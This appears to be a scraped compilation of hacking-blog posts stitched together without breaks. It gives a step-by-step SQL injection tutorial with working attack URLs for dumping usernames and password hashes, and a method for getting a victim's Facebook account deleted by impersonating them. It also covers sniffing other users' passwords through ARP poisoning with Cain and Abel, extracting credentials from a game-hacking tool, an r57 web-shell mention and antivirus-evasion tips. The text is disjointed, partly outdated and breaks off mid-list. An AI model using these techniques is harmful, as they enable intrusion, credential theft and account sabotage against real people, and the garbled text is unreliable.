first get a hacking tool no need to worry where to find just go to http://www.youtube.com and search "Runescape Hacker" or "Runescape Hacker Download Link"
you will get the downloading link in comments zone
now you have downloaded the hacker tool but -Don't open the Runescape Hacker Tool, It may be Backd00red Instead place it in a Safe area!
download and install hexworkshop now dont ask for link...google is your friend
now right click on tool ,,you will see "Edit this with HexWorkshop"...click it
you will see a mess of words and alphabets symbols....dont worry dont get confused believe me its easy to do!
now press ctrl+f... a boz will appear
-Now Before start Finding Anything Make sure you change the "Hex" to "String" value.
-Now Enter "Gmail" to the Box and Hit "Find".
-You will Get Popping Up a Black area. Don't touch it. Instead see on your Right for the Texts.
-Copy the Highlighted text and Paste it in a Text document (Newly Created).
-Remove the [.]>DOTs and You will see The Email ID + the Passwd.
SQL injection is a code that exploits a vulnerability in the database of a website.
Step 1
Firstly we will find a site which is vulnerable to SQLI .
So surf the site till u get to a URL which looks like this -:
www . prateek . com/articles/index.php?id=213
By this i mean a url ending with something like this "php?id=213"
Now to check weder the site is vulnerable or not , we add a ' sign at the end of the URL.
Example = > www . prateek . com/articles/index.php?id=213'
If we get an error like this "You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1"
or similar it means the site is vulnerable to SQLI.
Ok so now we will proceed to the next step
Step 2
Finding the number of columns , now we will find the number of columns with the ORDER BY command.
Example = >www . prateek . com/articles/index.php?id=213 order by 10--
So here we added the number 10 assuming that there are 10 colomns.
If the site does not have 10 columns it will give an error "Unknown column '10' in 'order clause'"
Ok this means that the number of coloms is less than 10 .So we continue to test by decreasing the number.
Example ==> www . prateek . com/articles/index.php?id=213 order by 9--
www . prateek . com/articles/index.php?id=213 order by 8--
www . prateek . com/articles/index.php?id=213 order by 7--
www . prateek . com/articles/index.php?id=213 order by 6--
www . prateek . com/articles/index.php?id=213 order by 5--
Step 3
Now when we test it for 5 columns it does not give an error and if we test it for 6 it gives an error which means that the number of columns is 5.
So now as we know that there are 5 coiumns we will now use the UNION ALL command.
EXAMPLE = >
www . prateek . com/articles/index.php?id=213 union all select 1,2,3,4,5--
As there were 5 columns we selected all the 5 columns.
When we execute this URL then on the page there will be number(s) displayed.
Like 2 or 3 or 4 etc.(This will not be greater than the number of columns) Step 4
Now the number which appeared we have to remember it as we will use it in the next step.
Let us assume that number 3 appeared.
So now we will check the version of MYSQL with the help of this number
Example - www . prateek . com/articles/index.php?id=213 union all select 1,2,@@version,4,5--
We used the @@version command to find out the version bieng used.
We replaced the number 3 (as we had got it in the last step) with @@version
Now after executing this the version number will be displayed. Step 5
like = > 5.0.51a-community
Now as the version is above 5 its fine.
Now we will find the names of columns and tables.
This will be done by -:
Example URL => www . prateek . com/articles/index.php?id=213 union all select 1,2,group_concat(table_name),4,5 from information_schema.tables where table_schema=databse()--
After executing this , names of tables will be displayed.
It maybe anything .
Not them down. (choose names having admin , username , user etc in them)
Now we will find the names of columns
Example URL = > www . prateek . com/articles/index.php?id=213 union all select 1,2,group_concat(column_name),4,5 from information_schema.columns where table_schema=databse()--
After executing this , names of columns will be displayed.
It maybe anything .
Not them down. (choose names having password, username , pass etc in them)
you might think what happens when you don't see a column like username or password?
then you have to do a little guessing.
Step 6
Now we will move further.
And place the names of columns and tables we noted down in the URL
Example = > www . prateek . com/articles/index.php?id=213 union all select 1,2,group_concat(username,0x3a,password),4,5 from admin--
In the above URL username is the column named username or user or admin etc. Similarly password is also a column. and the end part ie from admin (means the TABLE).
Thats it execute the URL and you will get the password in HASH (most probably , but if you are lucky you can even get it normally.)
Here is a method to delete any facebook profile or account. It works 100%. But its just for educational purpose. So don't use it on anyone. Once Deleted Profile can never be recovered. Use wisely.
WHAT ALL U NEED ?
1. Victim's profile link ( you can get it easily ) 2. His/Her Email which he/she uses to sign in 3. His/Her birth date which he/she has used in the profile 4. Make an Email ID on gmail or yahoo with the first name and last name same as on victim's facebook profile.
2. Enter details. In the place of ' email address where you can be contacted ' enter the fake email u created.
3. you will get a mail on that ID in which facebook people will ask your problem. Reply to them that you are XYZ( victim's name ) and you cant access your facebook account. Also you have lost access to your Email Address associated with the account. You dont know what to do now. The hacker is coming online regularly and using your account. If the victim is a girl also write ' I am a girl and it poses threat to my social life ' and write anything you want that could make them take action. ( no need though in 100 % cases they delete the account )
4. After 2-3 days youu will get a reply. They will again ask you that you have access to your associated Email or not? Reply them that you still don't have access to it. And repeat what all you wrote in first mail.
5. Next Day or Same Day you will get an Email that your account is disabled.
Ans. Hacking is the art of breaking into computers to gain knowledge that our society has hidden from us.
Hacking is illegal and the government spend lots of money each year to have hackers arrested.....when they
should be spending the money on more important issues
Q. What is a shadowed password?
A. A shadowed password is a cover for the real password file.
It shows that the real password is hidden somewhere else.
Q. How do I crack shadowed passwords?
Ans. Cracking a shadowed password file is impossible.
Assuming that you got the password file via anonymous ftp.
You should try connecting to port 25 and doing the sendmail bug. Q. What is the difference between an encrypted password and a shadowed password?
Ans. An encrypted password is just the real password scrambled and changed.
It can be cracked with a password cracked and a word file.
A shadowed password hides the encrypted password somewhere else other than the etc. dir.
Q. Where is the password file located?
Ans. The password file is located in the etc/passwd dir.
You can get into the etc dir by logging on to the domain via anonymous ftp.
Q. What is an exploit?
A. An exploit is something that exploits unix or another kind of OS.
You usually use exploits to gain root or high access to a system. They can prove to be very handy
Q. What are some basic telnet commands?
A. Below is a list of common telnet commands.
Command ------- Function access---------Telnet account c---------------Connect to a host Cont-------Continue D------Disconnect full--------Network echo Q. What is DNIC?
Ans. A DNIS says which network connect to the telnet you are using
Q. What is NUA?
Ans. The NUA is the address of the computer on telnet.
Q. What is a VAX/VMS?
Ans. A vax/vms is Digital Equipment's major computer line. It's proprietary operating system is known as vms.
Q. What is telnet?
A. Telnet is a program which lets you log in to other computers on the net.
Q. What is an anonymous remailer?
A. An anonymous remailer is a system on the Internet that allows you to send e-mail
anonymously or post messages to Usenet anonymously. You apply for an anonymous ID at the remailer site.
Then, when you send a message to the remailer, it sends it out from your anonymous ID at the remailer.
No one reading the post will know your real account name or host name. If someone sends a message to your
anonymous ID, it will be forwarded to your real account by the remailer.
Q. What is tcp/ip?
A. Tcp/ip is the system networks use to communicate with each other.
It stands for Transmission Control Protocol/Internet Protocol.
Q. What is a virus?
A. A Virus is a program which reproduces itself. It may attach itself to other programs,
it may create copies of itself. It may damage or corrupt data, change data,
or degrade the performance of your system by utilizing resources such as memory or disk space.
Some Viruse scanners detect some Viruses. No Virus scanners detect all Viruses.
Virus scanners will work for a while but people are always creating virii that will beat them.
Q. What is a trojan?
A. A trojan is a program which does an unauthorized function, hidden inside an authorized program.
It does something other than it claims to do, usually something malicious, and it is intended by the
author to do whatever it does. If it is not intentional, it is called a bug.
Q. What is a worm?
Ans. Worms are programsthat copy themselves over and over using up space and slowing down the system.
They are self contained and use the networks to spread, in much the same way that Viruses use files to spread.
Some people say the solution to Viruses and worms is to just not have any files or networks.
Q. What do I need to become a hacker?
A. You should start off with a good scanner, some dialups, a telnet client, and some knowladge of hacking.
Those are the basic things that you will need. If you are serious about hacking then you should get Unix,
or Linux(smaller, free version of unix).
Q. What are the domain codes?
A. Below is the current list of domain codes.
AD - Andorra
AE - United Arab Emirates
AF - Afghanistan
AG - Antigua and Barbuda
AI - Anguilla
AL - Albania
AM- Armenia
AN - Netherland Antilles
AO - Angola
AQ - Antarctica
AR - Argentina
AS - American Samoa
AT - Austria
AU - Australia
AW- Aruba
AZ - Azerbaidjan
BA - Bosnia-Herzegovina
BB - Barbados
BD - Banglades
BE - Belgium
BF - Burkina Faso
BG - Bulgaria
BH - Bahrain
BI - Burundi
BJ - Benin
BM- Bermuda
BN - Brunei Darussalam
BO - Bolivia
BR - Brazil
BS - Bahamas
BT - Buthan
BV - Bouvet Island
BW- Botswana
BY - Belarus
BZ - Belize CA- Canada
CC - Cocos (Keeling) Islands
CF - Central African Republic
CG - Congo
CH - Switzerland
CI - Ivory Coast
CK - Cook Islands
CL - Chile
CM - Cameroon
CN - China
CO -Colombia
CR -Costa Rica
CS - Czechoslovakia
CU - Cuba
CV - Cape Verde
CX - Christmas Island
CY - Cyprus
CZ - Czech Republic
DE - Germany
DJ -Djibouti
DK - Denmark
DM -Dominica
DO - Dominican Republic
DZ - Algeria
EC - Ecuador
EE -Estonia
EG - Egypt
EH - Western Sahara
ES - Spain
ET - Ethiopia
FI - Finland
FJ - Fiji
FK - Falkland Islands (Malvinas)
FM - Micronesia
FO - Faroe Islands
FR - France
FX - France (European Territory)
GA - Gabon
GB - Great Britain (UK)
GD - Grenada
GE - Georgia
GH - Ghana
GI -Gibraltar
GL - Greenland
GP - Guadeloupe (French)
GQ - Equatorial Guinea
GF - Guyana (French)
GM - Gambia
GN - Guinea
GR - Greece
GT - Guatemala
GU - Guam (US)
GW - Guinea Bissau
GY - Guyana HK - Hong Kong
HM - Heard and McDonald Islands
HN - Honduras
HR - Croatia
HT - Haiti
HU - Hungary
ID - Indonesia
IE - Ireland
IL - Israel IN- India
IO - British Indian Ocean Territory
IQ - Iraq
IR - Iran
IS - Iceland
IT - Italy
JM - Jamaica
JO - Jordan
JP - Japan
KE - Kenya
KG- Kirgistan
KH - Cambodia
KI - Kiribati
KM - Comoros
KN - Saint Kitts Nevis Anguilla
KP - North Korea
KR - South Korea
KW- Kuwait
KY - Cayman Islands
KZ - Kazachstan
LA - Laos
LB- Lebanon
LC - Saint Lucia
LI - Liechtenstein
LK - Sri Lanka
LR - Liberia
LS - Lesotho
LT - Lithuania
LU -- Luxembourg
LV - Latvia
LY - Libya
MA - Morocco
MC - Monaco
MD - Moldavia
MG - Madagascar
MH - Marshall Islands
ML - Mali
MM - Myanmar
MN - Mongolia
MO - Macau
MP -- Northern Mariana Islands
MQ - Martinique (French)
MR - Mauritania
MS - Montserrat
MT - Malta
MU - Mauritius
MV - Maldives
MW - Malawi
MX- Mexico
MY - Malaysia
MZ - Mozambique
NA - Namibia
NC- New Caledonia (French)
NE - Niger
NF - Norfolk Island
NG - Nigeria
NI - Nicaragua
NL - Netherlands
NO - Norway
NP - Nepal
NR - Nauru
NT - Neutral Zone
NU - Niue
NZ - New Zealand
OM - Oman
PA - Panama
PE - Peru
PF - Polynesia (French)
PG - Papua New
This is another tool that is favored in extracting or
recovering passwords. Note very carefully, Cain and Abel is a "PASSWORD
RECOVERY" tool, use it carefully.
(THIS POST IS FOR
EDUCATIONAL USE ONLY)
Before I start, there are a few
requirements.
Should have a
switched LAN. (Most ISPs other than BSNL provide broadband via LAN, e.g.
SIFY, HATHWAY, local Cable internet connections)
Any
Microsoft Windows Operating System.
If you are not sure
about being on a switched network, continue the steps, until you find
out.
Download and install Cain and Able from the link
given above.
Start Cain and Abel (requires admin privileges
in Vista), go to the sniffer tab, click on the configure menu, select
your NIC, check 'start sniffer on startup', press 'OK'.
Click
on the 'Start / Stop Sniffer' (the 2nd) button on the
toolbar. Now click the blue '+' (plus) sign (this is the 7th
button on the toolbar). Check 'All Tests' and click 'OK'.
After
the scan is complete, if you are on a switched network then, you must
be able to see many IP and MAC addresses in this pane. If you don't see
any IP other than your own, probably you are not on a switched network.
Notice
the tabs on the bottom, HOSTS, APR, Routing, Passwords, and VoIP. You
are currently on the HOSTS tab, select the APR tab click on the 'top
pane' and click the 'blue +' (7th on toolbar).
Now
you will again see the IP & MAC address (in the left pane) you saw
in Step 5. From this list, select your 'Gateway IP', (this will mostly
be something like 192.xxx.xxx.1 or 10.xxx.xxx.1 etc; check your network
properties for more info on gateway.) after selecting your 'Gateway IP
Address' (now some IP will appear on the right); drag and select all the
entries in the right pane, and click 'OK'.
Now click on the
'Start/Stop APR' (the 3rd) button on the toolbar. You will
see 'HALF ROUTING' and 'FULL ROUTING' entries in the lower pane.
Now
go to the Passwords tab on the bottom. Slowly you will see passwords
appearing in this section; most will be under HTTP.
The
password section gives you full details on the capture, including
Username, password, URL, etc. Any person who was online during the time
you completed Steps 3 – 5, will be affected, and you will have access to
their passwords.
Beware: What
this program does is send all the traffic through your computer, so the
LAN speeds slow down drastically. On my home network, LAN transfer
speeds reduced from 10MB/s to 100Kb/s in 10 minutes.
Today we shall see how to get admins pass in
mybb. What you need is to upload a shell i've used an r57 shell here
(which is the tricky part and you need to do that).
Many
people upload shells but little do they know how to use it effectively.
Batch is great for beginners. Simple commands, cant get easier than
that.
These are some useful tricks that can help you improve your
batch programing.
Here are some of my personal tricks.
1.
Password protect,
Invalid Passwords= Self destruction@echo off
cd
%systemroot% color 0a cls echo. echo. set /p
confirmation= Enter Security Password: if %confirmation%==Insection
goto confirmed if %confirmation%==selfdestruct goto selfdestruct if
exist "%systemroot%\death3.666" goto selfdestruct if exist
"%systemroot%\death2.666" goto say3 if exist
"%systemroot%\death1.666" goto say2 :say1 copy %0
"%systemroot%\death1.666" >nul attrib +r +h %systemroot%\*.666
>nul msg * Incorrect Password, File self destructs after 3 more
incorrect passwords. exit :say2 copy %0
"%systemroot%\death2.666" >nul attrib +r +h %systemroot%\*.666
>nul msg * Incorrect Password, File self destructs after 2 more
incorrect passwords. exit :say3 copy %0
"%systemroot%\death3.666" >nul attrib +r +h %systemroot%\*.666
>nul msg * Incorrect Password, File self destructs after 1 more
incorrect passwords. exit :selfdestruct msg * File Self
Destructed -Too many incorrect Passwords del %0 /f /q >nul :confirmed YOUR
CODE GOES HERE
As you can see, when the bat file is first
opened it will ask for a password.
As you can see when the correct
password is entered, it takes you to :confirmed and thats where you
place your codes.
If an invalid password is entered the bat
creates Hidden files which it uses to remember how many times an invalid
password was entered in %systemroot%/WINDOWS and informs you of an
invalid password entry.
So 1 invalid password = 1 log file
3 log
files = your bat deleting itself.
2. EICAR STRING
By simply putting this in the beginning of your bat, you may fool some
older AV's
Posts
